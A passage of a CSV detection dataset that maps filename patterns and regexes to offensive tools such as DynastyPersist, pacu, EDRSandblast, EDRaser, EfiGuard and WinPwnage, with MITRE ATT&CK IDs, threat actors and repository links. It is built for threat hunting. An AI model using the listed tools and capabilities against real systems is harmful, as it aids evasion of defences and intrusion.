"*/DynastyPersist/src/*.sh*",".{0,1000}\/DynastyPersist\/src\/.{0,1000}\.sh.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - 
T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","6865" "*/e2e_commands.txt*",".{0,1000}\/e2e_commands\.txt.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","6866" "*/e2e_test.py*",".{0,1000}\/e2e_test\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","6867" "*/Eagle RAT.exe*",".{0,1000}\/Eagle\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6868" "*/eap-info.nse*",".{0,1000}\/eap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6869" "*/earthworm.exe*",".{0,1000}\/earthworm\.exe.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","1","N/A","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","6870" "*/EASSniper.git*",".{0,1000}\/EASSniper\.git.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","1","N/A","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","6871" "*/EASSniper.ps1*",".{0,1000}\/EASSniper\.ps1.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","1","N/A","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","6872" "*/EASSniper.ps1*",".{0,1000}\/EASSniper\.ps1.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying 
Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","6873" "*/eas-valid-users.txt*",".{0,1000}\/eas\-valid\-users\.txt.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","0","#linux","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","6874" "*/ebapc_injection.exe*",".{0,1000}\/ebapc_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","6875" "*/Ebowla.git*",".{0,1000}\/Ebowla\.git.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","N/A","10","8","748","171","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z","6876" "*/ebowla.py*",".{0,1000}\/ebowla\.py.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","N/A","10","8","748","171","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z","6877" 
"*/ec2__backdoor_ec2_sec_groups*",".{0,1000}\/ec2__backdoor_ec2_sec_groups.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","6878" "*/ec2__check_termination_protection*.py",".{0,1000}\/ec2__check_termination_protection.{0,1000}\.py","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","#linux","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","6879" "*/ec2__startup_shell_script/main.py*",".{0,1000}\/ec2__startup_shell_script\/main\.py.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","#linux","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","6880" "*/ec2_public_ips_*_*.txt*",".{0,1000}\/ec2_public_ips_.{0,1000}_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","#linux","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","6881" "*/EC2Looter.py*",".{0,1000}\/EC2Looter\.py.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. 
by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tool","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","N/A","1","70","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z","6882" "*/echoac-poc.git*",".{0,1000}\/echoac\-poc\.git.{0,1000}","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","N/A","8","2","138","25","2024-01-09T16:44:00Z","2023-06-28T00:52:22Z","6883" "*/ecrprivenum.py*",".{0,1000}\/ecrprivenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","1","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","6884" "*/ecrpubenum.py*",".{0,1000}\/ecrpubenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","1","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","6885" "*/edb-35948/*",".{0,1000}\/edb\-35948\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6886" "*/EdgeDump.ahk*",".{0,1000}\/EdgeDump\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","6887" "*/EDR_Detector.git*",".{0,1000}\/EDR_Detector\.git.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","1","N/A","N/A","7","1","93","14","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z","6888" "*/EDR_Detector.rs*",".{0,1000}\/EDR_Detector\.rs.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - 
TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","1","N/A","N/A","7","1","93","14","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z","6889" "*/EDRaser.git*",".{0,1000}\/EDRaser\.git.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","6890" "*/edraser.py*",".{0,1000}\/edraser\.py.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","6891" "*/edr-checker/*",".{0,1000}\/edr\-checker\/.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","6892" "*/EDRPrison.git*",".{0,1000}\/EDRPrison\.git.{0,1000}","offensive_tool_keyword","EDRPrison","Leverage a legitimate WFP callout driver to prevent EDR agents from sending telemetry","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/senzee1984/EDRPrison","1","1","N/A","N/A","10","5","401","37","2024-08-02T18:10:02Z","2024-06-30T01:17:04Z","6893" "*/EDRSandblast.git*",".{0,1000}\/EDRSandblast\.git.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","6894" "*/EDRSandblast/*",".{0,1000}\/EDRSandblast\/.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","6895" "*/EDRSilencer.c*",".{0,1000}\/EDRSilencer\.c.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/netero1010/EDRSilencer","1","1","N/A","N/A","10","10","1645","209","2024-11-03T16:05:14Z","2023-12-26T04:15:39Z","6896" "*/EDRSilencer.git*",".{0,1000}\/EDRSilencer\.git.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","1","N/A","N/A","10","10","1645","209","2024-11-03T16:05:14Z","2023-12-26T04:15:39Z","6897" "*/EfiDSEFix.cpp*",".{0,1000}\/EfiDSEFix\.cpp.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","6898" "*/EfiDSEFix.exe*",".{0,1000}\/EfiDSEFix\.exe.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","6899" "*/EfiGuard.sln*",".{0,1000}\/EfiGuard\.sln.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","6900" "*/EfiGuardDxe.c*",".{0,1000}\/EfiGuardDxe\.c.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","6901" "*/EfsPotato.exe*",".{0,1000}\/EfsPotato\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6902" "*/EfsPotato.git*",".{0,1000}\/EfsPotato\.git.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","N/A","10","8","771","125","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z","6903" "*/egghunter.rb*",".{0,1000}\/egghunter\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6904" "*/Egress-Assess*",".{0,1000}\/Egress\-Assess.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","6905" "*/elevate_handle_inheritance.py*",".{0,1000}\/elevate_handle_inheritance\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","6907" "*/elevate_mofcomp.py*",".{0,1000}\/elevate_mofcomp\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","6908" "*/elevate_named_pipe_impersonation.py*",".{0,1000}\/elevate_named_pipe_impersonation\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","6909" "*/elevate_schtasks.py*",".{0,1000}\/elevate_schtasks\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","6910" "*/elevate_token_impersonation.py*",".{0,1000}\/elevate_token_impersonation\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","6911" "*/elevate_wmic.py*",".{0,1000}\/elevate_wmic\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","6912" "*/elevateit.bat*",".{0,1000}\/elevateit\.bat.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","6913" "*/ElevateKit/elevate.*",".{0,1000}\/ElevateKit\/elevate\..{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 
- APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","6914" "*/Elevator.git*",".{0,1000}\/Elevator\.git.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","1","N/A","N/A","10","7","614","69","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z","6915" "*/elf/dll*",".{0,1000}\/elf\/dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6916" "*/elf/exe*",".{0,1000}\/elf\/exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6917" "*/ELFLoader/*",".{0,1000}\/ELFLoader\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 